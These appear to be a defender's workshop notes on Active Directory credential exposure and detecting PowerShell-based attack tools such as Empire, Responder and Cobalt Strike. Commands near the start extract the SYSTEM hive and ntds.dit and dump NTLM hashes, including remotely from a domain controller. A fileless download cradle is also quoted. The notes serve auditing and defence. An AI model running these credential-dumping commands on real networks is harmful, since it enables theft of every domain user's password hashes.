.\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -localdestination c:\test\system -verbose -computername workstationvm
https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/
https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/
Then, you need the SYSTEM registry hive. Luckily, this can be directly saved, by running –
reg save HKLM\SYSTEM <YOUR OUTPUT PATH HERE>
Now that we’ve got both of those files, we can start extracting hashes!
With the system extract and ntds.dit copy in hand, fire up PowerShell, it’s time for DSInternals!
Running the following will extract the hashes in Hashcat format (necessary for the next step) –
$key = Get-BootKey -SystemHivePath '<PATH TO SYSTEM HIVE HERE>' Get-ADDBAccount -All -DBPath '<PATH TO NTDIS.DIT HERE>' -BootKey $key | Format-Custom -View HashcatNT | Out-File <OUTPUT PATH HERE> -Encoding ASCII
Now that we have a neat little hash extraction, we can get to comparing our users’ passwords against the Pwned Passwords dataset.
https://www.troyhunt.com/pwned-passwords-now-as-ntlm-hashes/
https://github.com/thegeekkid/CompromiseCheck
Because NTLM hashes aren't salted (do read the two answers there if you're wondering why), providing them in downloadable form means they can easily be used to compare to hashes within an AD environment just as they are
script to compare
Builds a hashmap of AD NTLM hashes/usernames and iterates through a second list of hashes checking for the existence of each entry in the AD NTLM hashmap
https://github.com/DGG-IT/Match-ADHashes/
DSInternals PowerShell Module, that can retrieve reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from remote domain controllers
dump all accounts at once, but this can cause heavy (=suspicious) replication traffic:
Get-ADReplAccount -All -NamingContext 'DC=Adatum,DC=com' -Server LON-DC1
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
DCSync:
https://adsecurity.org/?p=1729
http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
http://woshub.com/defending-windows-domain-against-mimikatz-attacks/
Credential Guard, has appeared that allows to isolate and protect LSASS from unauthorized access.
Ok lets move on to file-less malware detection and then demo
Ok let’s look at Empire
(New-object System.net.Webclient).DownloadString()
DownloadString() does not download any file to the disk but it copies the content of the remote file directly to the memory of the victim machine.
Agent and how Get-InjectThread finds it video
This video will show Inveigh Responder and then Get-InjectedThread to detect Empire in memory that had an injected process.
Defenders can use PowerShell to detect obfuscation and injected processes that Empire uses.
PowerShell Empire uses a default agent string that is detectable via network monitoring.
For example, an attacker might call VirtualAllocEx to allocate space for malicious code to execute, and then utilize CreateRemoteThread or another API call to execute the malicious code within another application. GetInjectedThreads will retrieve the start address of each active thread, then determine the associated section properties. If there is an observed executable running within this section, it is deemed to be injected. But keep in mind that some legitimate applications perform process injection (and you might also run across an injected thread and alert).
Detect CobaltStrike: https://github.com/JPCERTCC/aa-tools Volatility
Monitor Host and Network activities
Referr logs in WebLogin for mal behavior
Watch Network access after Phish
If I was an adversary I would use your creds in OWA or VPN to get onto workstations to get a foothold and collect more data…
Password Reuse (HaveIBeenPWND)
Passwords that are easy to guess
https://screencast-o-matic.com/u/vqZ/CrackHashResponder Go to 3:36 minutes into video
https://screencast-o-matic.com/u/vqZ/LLMNR_HTTPCapture Responder running and SMBRelay running with payload and Listener for SMBRelayPayload to launch Meterpreter (1:03 Minutes in).
https://g-laurent.blogspot.com/2017/03/multirelay-20-runas-pivot-svc-and.html?m=1
https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire <and see all the modules in Empire and the Agents.
Exploiting Windows network with Responder and MultiRelay: https://www.youtube.com/watch?v=rjRDsXp_MNk
Scripts are great for signatures how about behaviors?
DetectionLab to perform attacks and build defenses
https://medium.com/@clong/introducing-detection-lab-61db34bed6ae
Other Blue Team Tools are… GRR, Kansa, HELK
Or just build a noSQL db and dump everything into it and have a data scientist build queries/db
Mandiant MIR, etc
Turn off LLMNR to stop Responder attack
Free Tools to Review/Monitor/Log: MSFT Sysinternals: Sysmon, built-in Windows Audit logs, cmd line auditing, and PowerShell, Registry Monitoring (turn on)
My Wiki: https://wiki.cac.washington.edu/display/~moorej1@washington.edu/IR+Sandbox+Powershell+Obfuscation+and+Detection+Techniques
PowerShell v5 Security Enhancements & AD Security https://adsecurity.org/?p=2277
Ask your vendor for best practices or free tools that come with contract such as ATP
BloodHound Map AD https://github.com/BloodHoundAD/BloodHound
MSFT cloud https://cloudblogs.microsoft.com/microsoftsecure/2018/08/13/cybersecurity-threats-how-to-discover-remediate-and-mitigate/
https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4
RegMon: http://leelusoft.altervista.org/registry-live-watch.html
https://sourceforge.net/projects/regshot/
Team should have a mission and plan to guide them what is important to business. Could implement CyberSecurity Framework, Or Map the CIS Controls (core of NIST) to objectives. Map those to Tickets to track events related to controls for later analysis.
Cybersecurity Framework (CSF) Core: Identify, Protect, Detect, Respond, Recover
For an example of Detection Response team mappings:
Protect: CIS 3, Secure Configuration of End-User Devices
Detect: CIS 4, Continuus Vulnerability Assessment & Remediation
Respond: CIS 6, Maintenance, Monitoring, and Analysis of Audit Logs